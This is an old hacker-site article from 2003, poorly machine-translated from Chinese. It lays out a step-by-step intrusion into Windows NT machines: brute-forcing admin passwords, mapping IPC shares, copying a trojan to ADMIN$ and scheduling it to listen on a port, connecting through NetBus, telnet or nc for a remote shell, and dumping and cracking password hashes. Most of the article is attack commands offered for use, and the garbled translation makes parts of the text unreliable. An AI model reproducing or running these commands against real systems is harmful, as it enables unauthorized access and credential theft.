You look at the invasion method which understands (NT) |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>marvelous mentality>> you look at the invasion 
                  method which understands (NT)  Printing

            You look at the invasion method which understands (NT)
            Www.cshu.net  2003-3-24  fog rain village 

              1 method must have following several tools: PINGER; LETMEIN; 
              NTSRV; NETSVC; PWDDUMP; NC; L0PHTCRACK 
              2 starts, looks up a IP section with PINGER, found the goal, and 
              designation 
              3 enters DOS, uses LETMEIN 
              C: \>LETMEIN \\IP -admin -D MYPWD 
              Surveys this website USER and PASSWD, if does not have, to try 
              other websites, your general meeting found several fools, our here 
              take USER=KAWE PASSWD=KAWEN as 
              4 enters the IPC connection 
              C:\>NET USE \\IP\IP:KAWEN "/USER:" KAWEN " 
              After 5 goes in, the COPY tool goes in NTSRV; NETSVC; PWDDUMP 
              Method: COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32 
              6 starts wooden horses procedure (NESRV.EXE) and monitors 64,321 
              ports 
              C:\>NETSVC \\IP SCHEDULE /START (starts SCHEDULE) 
              C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG 
              (SCHEDULE starts NTSRV.EXE and monitors 64321) 
              7. Success The start wooden horse customer end (NETBUS) fills in 
              IP in HOSTNAME/IP, fills in 64321, in PORT to choose CONNECT. 
              8 options GETINFO meets a back-spacing news, may see NT in in 
              opposite party C plate WINNT 
              9 chooses APPREDIRECT, we must use its CMD.EXE, springs the window 
              fills in 
              C:\>C:\WINNT\SYSTEM32\CMD.EXE 
              PORT:64321 
              10 we may control using TELNET and the NC two ways 
              TELNET IP 64,321 
              NC IP 64,321 
              And looks at sharing with NET VIEW 
              11 moves PWDDUMP.EXE in TELNET or in the NC way, lags behind using 
              NETBUS SERVER.LC, and deciphers with L0PHTCRACK 
              C:\>WINNT>SYSTEM32>PWDDUMMP >SERVER.LC uses the L0PHTCRACK 
              solution password 
              12 obtains PASSWD to make any to be casual you, did not forget X 
              to fall on you to pass to on his loom FILE.


              Original author: ` 
              Origin: ` 
              Altogether has 395 readers to read this article 

              [Tells friend] 
            Previous article:The busy center chaotic Web server patch can freeze 
            the partial customers system 

            Next article:The Microsoft Office 2,003 testing versions cause the 
            viral scanning software stop 

            - this week popular article - related article 
            In ASP uses the SQL sentence (total collection)
            Opens 3,389 codes (CPP)
            Port greatly entire Chinese edition
            How raises own programming level
            Enters the server using the Microsoft newest strict heavy duty 
            WebDAV long-distance buffer overflow loophole! (In view of English 
            version method) 
            A WEBDAVX overflow success invasion test
            The WebDav long-distance overflow loophole analyzes



      CSHU 
